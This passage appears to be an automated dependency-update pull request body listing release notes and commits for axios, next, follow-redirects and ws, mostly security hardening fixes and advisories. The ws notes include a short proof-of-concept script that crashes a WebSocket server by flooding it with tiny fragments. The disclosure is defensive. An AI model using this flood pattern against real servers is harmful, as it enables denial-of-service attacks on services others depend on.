href=\"https://redirect.github.com/axios/axios/issues/7252\"\u003e#7252\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eAxiosURLSearchParams\u003c/code\u003e Regex:\u003c/strong\u003e Improves the regex used for param serialisation to avoid edge-case mismatches. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10736\"\u003e#10736\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eResilient Value Parsing:\u003c/strong\u003e Parses out header/config values instead of throwing on malformed input. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10687\"\u003e#10687\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/axios/axios/blob/v1.x/CHANGELOG.md\"\u003eaxios's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.15.2 - April 21, 2026\u003c/h2\u003e\n\u003cp\u003eThis release delivers prototype-pollution hardening for the Node HTTP adapter, adds an opt-in \u003ccode\u003eallowedSocketPaths\u003c/code\u003e allowlist to mitigate SSRF via Unix domain sockets, fixes a keep-alive socket memory leak, and ships supply-chain hardening across CI and security docs.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003ePrototype Pollution Hardening (HTTP Adapter):\u003c/strong\u003e Hardened the Node HTTP adapter and \u003ccode\u003eresolveConfig\u003c/code\u003e/\u003ccode\u003emergeConfig\u003c/code\u003e/validator paths to read only own properties and use null-prototype config objects, preventing polluted \u003ccode\u003eauth\u003c/code\u003e, \u003ccode\u003ebaseURL\u003c/code\u003e, \u003ccode\u003esocketPath\u003c/code\u003e, \u003ccode\u003ebeforeRedirect\u003c/code\u003e, and \u003ccode\u003einsecureHTTPParser\u003c/code\u003e from influencing requests. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10779\"\u003e#10779\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSSRF via \u003ccode\u003esocketPath\u003c/code\u003e:\u003c/strong\u003e Rejects non-string \u003ccode\u003esocketPath\u003c/code\u003e values and adds an opt-in \u003ccode\u003eallowedSocketPaths\u003c/code\u003e config option to restrict permitted Unix domain socket paths, returning \u003ccode\u003eAxiosError\u003c/code\u003e \u003ccode\u003eERR_BAD_OPTION_VALUE\u003c/code\u003e on mismatch. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10777\"\u003e#10777\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSupply-chain Hardening:\u003c/strong\u003e Added \u003ccode\u003e.npmrc\u003c/code\u003e with \u003ccode\u003eignore-scripts=true\u003c/code\u003e, lockfile lint CI, non-blocking reproducible build diff, scoped CODEOWNERS, expanded \u003ccode\u003eSECURITY.md\u003c/code\u003e/\u003ccode\u003eTHREATMODEL.md\u003c/code\u003e with provenance verification (\u003ccode\u003enpm audit signatures\u003c/code\u003e), 60-day resolution policy, and maintainer incident-response runbook. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10776\"\u003e#10776\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eallowedSocketPaths\u003c/code\u003e Config Option:\u003c/strong\u003e New request config option (and TypeScript types) to allowlist Unix domain socket paths used by the Node http adapter; backwards compatible when unset. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10777\"\u003e#10777\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🐛 Bug Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eKeep-alive Socket Memory Leak:\u003c/strong\u003e Installs a single per-socket \u003ccode\u003eerror\u003c/code\u003e listener tracking the active request via \u003ccode\u003ekAxiosSocketListener\u003c/code\u003e/\u003ccode\u003ekAxiosCurrentReq\u003c/code\u003e, eliminating per-request listener accumulation, \u003ccode\u003eMaxListenersExceededWarning\u003c/code\u003e, and linear heap growth under concurrent or long-running keep-alive workloads (fixes \u003ca href=\"https://redirect.github.com/axios/axios/issues/10780\"\u003e#10780\u003c/a\u003e). (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10788\"\u003e#10788\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🔧 Maintenance \u0026amp; Chores\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eChangelog:\u003c/strong\u003e Updated \u003ccode\u003eCHANGELOG.md\u003c/code\u003e with v1.15.1 release notes. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10781\"\u003e#10781\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/axios/axios/compare/v1.15.1...v1.15.2\"\u003eFull Changelog\u003c/a\u003e\u003c/p\u003e\n\u003chr /\u003e\n\u003ch2\u003ev1.15.1 - April 19, 2026\u003c/h2\u003e\n\u003cp\u003eThis release ships a coordinated set of security hardening fixes across headers, body/redirect limits, multipart handling, and XSRF/prototype-pollution vectors, alongside a broad sweep of bug fixes, test migrations, and threat-model documentation updates.\u003c/p\u003e\n\u003ch2\u003e🔒 Security Fixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eHeader Injection Hardening:\u003c/strong\u003e Tightened validation and sanitisation across request header construction to close the header-injection attack surface. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10749\"\u003e#10749\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eCRLF Stripping in Multipart Headers:\u003c/strong\u003e Correctly strips CR/LF from multipart header values to prevent injection via field names and filenames. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10758\"\u003e#10758\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003ePrototype Pollution / Auth Bypass:\u003c/strong\u003e Replaced unsafe \u003ccode\u003ein\u003c/code\u003e checks with \u003ccode\u003ehasOwnProperty\u003c/code\u003e to prevent authentication bypass via prototype pollution on config objects, with additional regression tests. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10761\"\u003e#10761\u003c/a\u003e\u003c/strong\u003e, \u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10760\"\u003e#10760\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003ewithXSRFToken\u003c/code\u003e Truthy Bypass:\u003c/strong\u003e Short-circuits on any truthy non-boolean value, so an ambiguous config no longer silently leaks the XSRF token cross-origin. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10762\"\u003e#10762\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003emaxBodyLength\u003c/code\u003e With Zero Redirects:\u003c/strong\u003e Enforces \u003ccode\u003emaxBodyLength\u003c/code\u003e even when \u003ccode\u003emaxRedirects\u003c/code\u003e is set to \u003ccode\u003e0\u003c/code\u003e, closing a bypass path for oversized request bodies. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10753\"\u003e#10753\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eStreamed Response \u003ccode\u003emaxContentLength\u003c/code\u003e Bypass:\u003c/strong\u003e Applies \u003ccode\u003emaxContentLength\u003c/code\u003e to streamed responses that previously bypassed the cap. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10754\"\u003e#10754\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003eFollow-up CVE Completion:\u003c/strong\u003e Completes an earlier incomplete CVE fix to fully close the regression window. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10755\"\u003e#10755\u003c/a\u003e\u003c/strong\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e🚀 New Features\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eAI-Based Docs Translations:\u003c/strong\u003e Initial scaffold for AI-assisted translations of the documentation site. (\u003cstrong\u003e\u003ca href=\"https://redirect.github.com/axios/axios/issues/10705\"\u003e#10705\u003c/a\u003e\u003c/strong\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/582934382e4e0e0bcb679c628071a4203e93cf57\"\u003e\u003ccode\u003e5829343\u003c/code\u003e\u003c/a\u003e chore(release): prepare release 1.15.2 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10789\"\u003e#10789\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/4709a48fa2717ba97f43f5432d48ca4e26c2d326\"\u003e\u003ccode\u003e4709a48\u003c/code\u003e\u003c/a\u003e fix: added fix for memory leak in sockets (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10788\"\u003e#10788\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/be3336014e01f9a4fc1f8aef15303cf7daaf58db\"\u003e\u003ccode\u003ebe33360\u003c/code\u003e\u003c/a\u003e chore: update changelog (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10781\"\u003e#10781\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/47915144662f2733e6c051bdcb895a8c8f0586aa\"\u003e\u003ccode\u003e4791514\u003c/code\u003e\u003c/a\u003e fix: more header pollutions (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10779\"\u003e#10779\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/6feafcff6c2dbafe206161c5d09e38e1d36af66f\"\u003e\u003ccode\u003e6feafcf\u003c/code\u003e\u003c/a\u003e fix: socket issue (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10777\"\u003e#10777\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/302e2739c602f00e323d4f3f5c79500647633a73\"\u003e\u003ccode\u003e302e273\u003c/code\u003e\u003c/a\u003e docs: update docs, add a couple actions etc (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10776\"\u003e#10776\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/ac42446be51300fe214ba3c6e40cc95f34fd6871\"\u003e\u003ccode\u003eac42446\u003c/code\u003e\u003c/a\u003e chore(release): prepare release 1.15.1 (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10767\"\u003e#10767\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/908f2206b6bfeff67236784abce85935698ac1d9\"\u003e\u003ccode\u003e908f220\u003c/code\u003e\u003c/a\u003e docs: update threatmodel (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10765\"\u003e#10765\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/f93f8155250c2e066205521eda05ae22983a1f6d\"\u003e\u003ccode\u003ef93f815\u003c/code\u003e\u003c/a\u003e docs: added docs around potential decompressions bomb (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10763\"\u003e#10763\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/axios/axios/commit/1728aa1b15b8857f970611fd8983c06b423fc486\"\u003e\u003ccode\u003e1728aa1\u003c/code\u003e\u003c/a\u003e fix: short-circuits on any truthy non-boolean in withXSRFToken (\u003ca href=\"https://redirect.github.com/axios/axios/issues/10762\"\u003e#10762\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/axios/axios/compare/v1.14.0...v1.15.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `next` from 16.2.2 to 16.2.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vercel/next.js/releases\"\u003enext's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev16.2.6\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\nThis release contains security fixes and backported bug fixes. It does \u003cstrong\u003enot\u003c/strong\u003e include all pending features/changes on canary.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch3\u003eSecurity Fixes\u003c/h3\u003e\n\u003cp\u003eThe following advisories have been addressed:\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eHigh:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj\"\u003eGHSA-8h8q-6873-q5fj: Denial of Service with Server Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f\"\u003eGHSA-267c-6grr-h53f: Middleware / Proxy bypass in App Router applications via segment-prefetch routes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-26hh-7cqf-hhc6\"\u003eGHSA-26hh-7cqf-hhc6: Middleware / Proxy bypass in App Router applications via segment-prefetch routes - \u003cstrong\u003eIncomplete Fix Follow-Up\u003c/strong\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx\"\u003eGHSA-mg66-mrh9-m8jx: Denial of Service via connection exhaustion in applications using Cache Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-492v-c6pp-mqqv\"\u003eGHSA-492v-c6pp-mqqv: Middleware / Proxy bypass through dynamic route parameter injection\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r\"\u003eGHSA-c4j6-fc7j-m34r: Server-side request forgery in applications using WebSocket upgrades\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5\"\u003eGHSA-36qx-fr4f-26g5: Middleware / Proxy bypass in Pages Router applications using i18n\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eModerate:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q\"\u003eGHSA-ffhc-5mcf-pf4q: Cross-site scripting in App Router applications using CSP nonces\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h\"\u003eGHSA-gx5p-jg67-6x7h: Cross-site scripting in beforeInteractive scripts with untrusted input\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh\"\u003eGHSA-h64f-5h5j-jqjh: Denial of Service in the Image Optimization API\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-wfc6-r584-vfw7\"\u003eGHSA-wfc6-r584-vfw7: Cache poisoning in React Server Component responses\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eLow:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-vfv6-92ff-j949\"\u003eGHSA-vfv6-92ff-j949: Cache poisoning via collisions in React Server Component cache-busting\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-3g8h-86w9-wvmq\"\u003eGHSA-3g8h-86w9-wvmq: Middleware / Proxy redirects can be cache-poisoned\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCore Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix: preserve HTTP access fallbacks during prerender recovery (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/92231\"\u003e#92231\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix fallback route params case in app-page handler (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/91737\"\u003e#91737\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix invalid HTML response for route-level RSC requests in deployment adapter (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/91541\"\u003e#91541\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ePatch setHeader for direct route handlers (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93101\"\u003e#93101\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eInclude deployment id in \u003ccode\u003ecacheHandlers\u003c/code\u003e keys (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93453\"\u003e#93453\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix double-encoding of URL pathname parts in client param parsing (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93491\"\u003e#93491\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev16.2.5\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\nThis release contains security fixes and backported bug fixes. It does \u003cstrong\u003enot\u003c/strong\u003e include all pending features/changes on canary.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch3\u003eSecurity Fixes\u003c/h3\u003e\n\u003cp\u003eThe following advisories have been addressed:\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eHigh:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj\"\u003eGHSA-8h8q-6873-q5fj: Denial of Service with Server Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f\"\u003eGHSA-267c-6grr-h53f: Middleware / Proxy bypass in App Router applications via segment-prefetch routes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx\"\u003eGHSA-mg66-mrh9-m8jx: Denial of Service via connection exhaustion in applications using Cache Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-492v-c6pp-mqqv\"\u003eGHSA-492v-c6pp-mqqv: Middleware / Proxy bypass through dynamic route parameter injection\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r\"\u003eGHSA-c4j6-fc7j-m34r: Server-side request forgery in applications using WebSocket upgrades\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/ee6e79b1792a4d401ddf2480f40a83549fe8e722\"\u003e\u003ccode\u003eee6e79b\u003c/code\u003e\u003c/a\u003e v16.2.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/afa053d9eb9c2a68c7eba43e84fe6bed8babcd45\"\u003e\u003ccode\u003eafa053d\u003c/code\u003e\u003c/a\u003e Turbopack: Match proxy matchers with webpack implementation (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93594\"\u003e#93594\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/97a154e5bbee0cb1ac3fb8aa4db66ac36e796e3d\"\u003e\u003ccode\u003e97a154e\u003c/code\u003e\u003c/a\u003e Turbopack: Fix middleware matcher suffix (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93590\"\u003e#93590\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/83899bc89103d4df1479e065c7c1e09d4698a7b6\"\u003e\u003ccode\u003e83899bc\u003c/code\u003e\u003c/a\u003e [backport] Disable build caches for production/staging/force-preview deploys ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/7b222b90954d607fc28a34e9b360a9b1636bc206\"\u003e\u003ccode\u003e7b222b9\u003c/code\u003e\u003c/a\u003e [backport][test] Pin package manager to patch versions (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93595\"\u003e#93595\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/a8dc24f1fe23d4a22d24fac734837f7c824138f7\"\u003e\u003ccode\u003ea8dc24f\u003c/code\u003e\u003c/a\u003e [backport] Turbopack: more strict vergen setup (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93587\"\u003e#93587\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/766148f9cd48c0e218acafcd0f15defc14871bf4\"\u003e\u003ccode\u003e766148f\u003c/code\u003e\u003c/a\u003e v16.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/0dd94836a8b43209fcfefa448c141683c22c1a27\"\u003e\u003ccode\u003e0dd9483\u003c/code\u003e\u003c/a\u003e fix: add explicit checks for RSC header (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/83\"\u003e#83\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/98\"\u003e#98\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/d166096c399c4fc4e09cd2d1bf26dca6579a855d\"\u003e\u003ccode\u003ed166096\u003c/code\u003e\u003c/a\u003e fix proxy matching for segment prefetch URLs (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/89\"\u003e#89\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/96\"\u003e#96\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/9d50c0b7190f59c470308578e12882788819f14c\"\u003e\u003ccode\u003e9d50c0b\u003c/code\u003e\u003c/a\u003e Strip next-resume header from incoming requests (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/92\"\u003e#92\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/vercel/next.js/compare/v16.2.2...v16.2.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for next since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `follow-redirects` from 1.15.11 to 1.16.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/0c23a223067201c368035e82954c11eb2578a33b\"\u003e\u003ccode\u003e0c23a22\u003c/code\u003e\u003c/a\u003e Release version 1.16.0 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9\"\u003e\u003ccode\u003e844c4d3\u003c/code\u003e\u003c/a\u003e Add sensitiveHeaders option.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5e8b8d024e2c76f804a284258e585ecb49a575be\"\u003e\u003ccode\u003e5e8b8d0\u003c/code\u003e\u003c/a\u003e ci: add Node.js 24.x to the CI matrix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7953e2255aa0b93602eed3804f3bc5e6923a03af\"\u003e\u003ccode\u003e7953e22\u003c/code\u003e\u003c/a\u003e ci: upgrade GitHub Actions to use setup-node@v6 and checkout@v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/86dc1f86e4b56bcd642c78384d51f10f123aea75\"\u003e\u003ccode\u003e86dc1f8\u003c/code\u003e\u003c/a\u003e Sanitizing input.\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/follow-redirects/follow-redirects/compare/v1.15.11...v1.16.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ws` from 8.20.0 to 8.21.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/websockets/ws/releases\"\u003ews's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.21.0\u003c/h2\u003e\n\u003ch1\u003eFeatures\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eIntroduced the \u003ccode\u003emaxBufferedChunks\u003c/code\u003e and \u003ccode\u003emaxFragments\u003c/code\u003e options (2b2abd45).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBug fixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a remote memory exhaustion DoS vulnerability (2b2abd45).\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eA high volume of tiny fragments and data chunks could be sent by a peer, using\nmodest network traffic, to crash a \u003ccode\u003ews\u003c/code\u003e server or client due to OOM.\u003c/p\u003e\n\u003cpre lang=\"js\"\u003e\u003ccode\u003eimport { WebSocket, WebSocketServer } from 'ws';\r\n\u003cp\u003econst wss = new WebSocketServer({ port: 0 }, function () {\nconst data = Buffer.alloc(1);\nconst options = { fin: false };\nconst { port } = wss.address();\nconst ws = new WebSocket(\u003ccode\u003ews://localhost:${port}\u003c/code\u003e);\u003c/p\u003e\n\u003cp\u003ews.on('open', function () {\n(function send() {\nws.send(data, options, function (err) {\nif (err) return;\nsend();\n});\n})();\n});\u003c/p\u003e\n\u003cp\u003ews.on('error', console.error);\nws.on('close', function (code, reason) {\nconsole.log(\u003ccode\u003eclient close - code: ${code} reason: ${reason.toString()}\u003c/code\u003e);\n});\n});\u003c/p\u003e\n\u003cp\u003ewss.on('connection', function (ws) {\nws.on('error', console.error);\nws.on('close', function (code, reason) {\nconsole.log(\u003ccode\u003eserver close - code: ${code} reason: ${reason.toString()}\u003c/code\u003e);\n});\n});\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cp\u003eThe vulnerability was responsibly disclosed and fixed by \u003ca href=\"https://github.com/Nadav0077\"\u003eNadav Magier\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eIn vulnerable versions, the issue can be mitigated by lowering the value of the\n\u003ccode\u003emaxPayload\u003c/code\u003e option if possible.\u003c/p\u003e\n\u003ch2\u003e8.20.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... 